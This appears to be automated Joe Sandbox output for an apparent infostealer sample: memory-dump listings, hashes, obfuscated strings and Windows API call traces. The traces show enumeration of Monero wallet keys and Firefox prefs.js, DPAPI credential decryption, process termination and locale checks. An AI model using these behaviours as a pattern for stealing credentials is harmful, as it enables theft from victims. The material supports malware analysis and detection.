                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: 3a6145f3a1bfa7e518c05b2fd6953aabcc6d87ea98395a65b45f046aba759725
                            • Instruction ID: 5f84bca6eeeb1d3aa9ceddce54de0e85da5fb0b4ab141c95f0807e992adab216
                            • Opcode Fuzzy Hash: 3a6145f3a1bfa7e518c05b2fd6953aabcc6d87ea98395a65b45f046aba759725
                            • Instruction Fuzzy Hash: 33B14572A401189BDB25FF60DD96FEE7779AF94300F0045A8E90A57181EF34AB48DF92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (~@?$0jol$Cmo?$KHx4$Rx}$V"q<$ky/I$pq_;$yRW_$}]A$~}?
                            • API String ID: 0-1588815052
                            • Opcode ID: 6c7b81e6258bcff936e69edb93448f6b8384c1c4be413f5d3d21ac2d8432c49f
                            • Instruction ID: a57faba1d844626fa744b05d7aa2b3e0a99275299b454d470e8064df3c5b16ad
                            • Opcode Fuzzy Hash: 6c7b81e6258bcff936e69edb93448f6b8384c1c4be413f5d3d21ac2d8432c49f
                            • Instruction Fuzzy Hash: B1B215F3A0C2009FE7046E29EC8577AFBE9EF94320F1A493DE6C4C7744EA7558058696
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F5523C,?,?,?,00F552E4,?,?,00000000,?,00000000), ref: 00F31963
                            • StrCmpCA.SHLWAPI(?,00F5538C), ref: 00F319B3
                            • StrCmpCA.SHLWAPI(?,00F55434), ref: 00F319C9
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F31D80
                            • DeleteFileA.KERNEL32(00000000), ref: 00F31E0A
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F31E60
                            • FindClose.KERNEL32(000000FF), ref: 00F31E72
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: a04823ab3ff25d3ff5dc4f6cb168875a87468d219f9830599590ec8c91dc13d0
                            • Instruction ID: 8cc7d40debcc6c5e29b6a0e62b88219ac3f9e83772357228d868b22c341c3561
                            • Opcode Fuzzy Hash: a04823ab3ff25d3ff5dc4f6cb168875a87468d219f9830599590ec8c91dc13d0
                            • Instruction Fuzzy Hash: 0F1243719505289BDB15FB60CCA6EEE7739BF54300F4045D9B90A62091EF386F88EF62
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00F50C32), ref: 00F3DF5E
                            • StrCmpCA.SHLWAPI(?,00F515C0), ref: 00F3DFAE
                            • StrCmpCA.SHLWAPI(?,00F515C4), ref: 00F3DFC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F3E4E0
                            • FindClose.KERNEL32(000000FF), ref: 00F3E4F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: 1p~g$2F?o$NN?Q$V:{$Yt$Z37O$Z37O$dqy$f%($S{u
                            • API String ID: 0-548501366
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F515A8,00F50BAF), ref: 00F3DBEB
                            • StrCmpCA.SHLWAPI(?,00F515AC), ref: 00F3DC33
                            • StrCmpCA.SHLWAPI(?,00F515B0), ref: 00F3DC49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F3DECC
                            • FindClose.KERNEL32(000000FF), ref: 00F3DEDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F49905
                            • Process32First.KERNEL32(00F39FDE,00000128), ref: 00F49919
                            • Process32Next.KERNEL32(00F39FDE,00000128), ref: 00F4992E
                            • StrCmpCA.SHLWAPI(?,00F39FDE), ref: 00F49943
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F4995C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F4997A
                            • CloseHandle.KERNEL32(00000000), ref: 00F49987
                            • CloseHandle.KERNEL32(00F39FDE), ref: 00F49993
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 2696918072-0
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • GetKeyboardLayoutList.USER32(00000000,00000000,00F505B7), ref: 00F47D71
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00F47D89
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00F47D9D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F47DF2
                            • LocalFree.KERNEL32(00000000), ref: 00F47EB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00F50D79), ref: 00F3E5A2
                            • StrCmpCA.SHLWAPI(?,00F515F0), ref: 00F3E5F2
                            • StrCmpCA.SHLWAPI(?,00F515F4), ref: 00F3E608
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00F3ECDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: 3o?$"ru$NWo$_<[_$_EK;$JWW
                            • API String ID: 0-551700085
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: \u$\u${${$}$}
                            • API String ID: 0-582841131
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F3C971
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F3C97C
                            • lstrcat.KERNEL32(?,00F50B47), ref: 00F3CA43
                            • lstrcat.KERNEL32(?,00F50B4B), ref: 00F3CA57
                            • lstrcat.KERNEL32(?,00F50B4E), ref: 00F3CA78
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00F46C0C
                            • sscanf.NTDLL ref: 00F46C39
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F46C52
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F46C60
                            • ExitProcess.KERNEL32 ref: 00F46C7A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: f4921fd8000a1738e27dfe3be5b7fe178f733f8a0328c6e79db67ebe3f6104d7
                            • Instruction ID: 6dd2356e3f59d5144dddf984bf6e630f812d318634f6161290109adc45157495
                            • Opcode Fuzzy Hash: f4921fd8000a1738e27dfe3be5b7fe178f733f8a0328c6e79db67ebe3f6104d7
                            • Instruction Fuzzy Hash: 5121ED75D00208AFCF15DFE4E8499EEB7B5FF48301F048529E506E3254EB34A604CB65
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F372AD
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F372B4
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F372E1
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00F37304
                            • LocalFree.KERNEL32(?), ref: 00F3730E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: ee959634a6dbc4706a72e7738de51c00a1f84d10d15c6cbfe2701c4926ad95e9
                            • Instruction ID: 23bafc7a53f9c20e61602a924fe33d497640df6d56fda6e9fc5a9de50ea671bb
                            • Opcode Fuzzy Hash: ee959634a6dbc4706a72e7738de51c00a1f84d10d15c6cbfe2701c4926ad95e9
                            • Instruction Fuzzy Hash: 600112B5A44308BFDB20DFE4DC4AF9D7778AB44B00F104544FB45AB2C5DA70BA009B64
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F497AE
                            • Process32First.KERNEL32(00F50ACE,00000128), ref: 00F497C2
                            • Process32Next.KERNEL32(00F50ACE,00000128), ref: 00F497D7
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 00F497EC
                            • CloseHandle.KERNEL32(00F50ACE), ref: 00F4980A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 0451f2ed00eededc52453de7940d837c30fc2665acd23d1823bd5895bbbf63b5
                            • Instruction ID: 9e763954fbc7826ad472cfd7acb9fd3a5eb7b455ef295f435a2a0be57e1d36da
                            • Opcode Fuzzy Hash: 0451f2ed00eededc52453de7940d837c30fc2665acd23d1823bd5895bbbf63b5
                            • Instruction Fuzzy Hash: F0012175A14208EFDB21DFA4D948BDEBBB9BF08700F104698E949E7280D770AB40DF50
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: <7\h$huzx
                            • API String ID: 0-2989614873
                            • Opcode ID: 3a52eafd0de6a069c9c871fd2ad141b81775b13073e98e93f0b8748c45c25082
                            • Instruction ID: 013c3b22e592b53178df0f51d4b228dc1782695b4c39083c97d1f8c19ca9d782
                            • Opcode Fuzzy Hash: 3a52eafd0de6a069c9c871fd2ad141b81775b13073e98e93f0b8748c45c25082
                            • Instruction Fuzzy Hash: 3163573281DBD41EC727CB3047B61517F66BA13A2231D49CECAC18F5B3C694AA1AF356
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Au|$Nx>$[GV=$\"?/
                            • API String ID: 0-852669376
                            • Opcode ID: c693663f24fe16868cf5b94703e0e1db33288a6e7d3b66da1a7224e93d7208d7
                            • Instruction ID: 0bc0b1181703cb58a100209ea332843377486b15e6044e2285143adfa95541f8
                            • Opcode Fuzzy Hash: c693663f24fe16868cf5b94703e0e1db33288a6e7d3b66da1a7224e93d7208d7
                            • Instruction Fuzzy Hash: 44B24DF360C2049FE704AE2DEC8567EB7E9EF84720F16863DEAC5C7744EA3558018696
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00F351D4,40000001,00000000,00000000,?,00F351D4), ref: 00F49050
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 7cb51f0e6ac5c775b457f4037da799f0d28cee6b4e10cf89baf293aad5adcf3a
                            • Instruction ID: 13e2b202b6be62146e972ef0997b400982607f47ac571216ee1d5876f89e958a
                            • Opcode Fuzzy Hash: 7cb51f0e6ac5c775b457f4037da799f0d28cee6b4e10cf89baf293aad5adcf3a
                            • Instruction Fuzzy Hash: 33110A75204204FFDF10CFA8D888FAB37A9AF89310F108548FD1A8B241D7B5E941AB60
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F34F3E,00000000,00000000), ref: 00F3A23F
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00F34F3E,00000000,?), ref: 00F3A251
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F34F3E,00000000,00000000), ref: 00F3A27A
                            • LocalFree.KERNEL32(?,?,?,?,00F34F3E,00000000,?), ref: 00F3A28F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: 671bcb95c6d7f7f2c53dcade142c96e3fab6bb1f9d3cff6fe30384d9b16a0656
                            • Instruction ID: 0f8539523e01713e35e4f1b0e951afecfe54b2c4726b01b67aad5d26ce95deb1
                            • Opcode Fuzzy Hash: 671bcb95c6d7f7f2c53dcade142c96e3fab6bb1f9d3cff6fe30384d9b16a0656
                            • Instruction Fuzzy Hash: B211A474640308EFEB11CF64D895FAA77B5EB89B10F208558FD159B380C772A941CB50
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0098DD88,00000000,?,00F50DF8,00000000,?,00000000,00000000), ref: 00F47BF3
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F47BFA
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0098DD88,00000000,?,00F50DF8,00000000,?,00000000,00000000,?), ref: 00F47C0D
                            • wsprintfA.USER32 ref: 00F47C47
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 99a8b0e32d16bd058f427a17503b5ad413d80de4e806fe40d4e853bdcb68f11f
                            • Instruction ID: 95bde1190f41d0ca797675bb01f1573f0bb597d2272183ba464c72595f6b3d83
                            • Opcode Fuzzy Hash: 99a8b0e32d16bd058f427a17503b5ad413d80de4e806fe40d4e853bdcb68f11f
                            • Instruction Fuzzy Hash: A511A1B1A05219EFEB20DB54DC49FA9BB78FB44721F1043D5FA19932C0DB746A409B51
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: eu$02:o$=9y9
                            • API String ID: 0-3468283924
                            • Opcode ID: 90babf1e58bbb866c9c64e069048558ec2a28812b29e7c1cbc0dbc82a6e14932
                            • Instruction ID: d476e6a349e5bf363a73c9028273cd227495a5ffd0140ec43c9a2f359035ff01
                            • Opcode Fuzzy Hash: 90babf1e58bbb866c9c64e069048558ec2a28812b29e7c1cbc0dbc82a6e14932
                            • Instruction Fuzzy Hash: 45B206F3A0C2149FE304AE29EC4567AFBE5EF94620F1A893DE6C4C7744E63598418793
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 9`j$uN|Z$b1
                            • API String ID: 0-1018111938
                            • Opcode ID: 0fd8676a8dd057ce65bb985b8d9fb48cc779ec455ae81e0deb960a0949f16f43
                            • Instruction ID: b3b28e483fc25ce660bd9e5e7b8a80a51a5f44086de25dcdf8db1f22d4c546f6
                            • Opcode Fuzzy Hash: 0fd8676a8dd057ce65bb985b8d9fb48cc779ec455ae81e0deb960a0949f16f43
                            • Instruction Fuzzy Hash: 97B2F7F3A0C2009FE3086E2DEC8577AB7E5EF94720F16893DE6C587744EA3558118697
                            APIs
                            • CoCreateInstance.COMBASE(00F4E120,00000000,00000001,00F4E110,00000000), ref: 00F439A8
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00F43A00
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
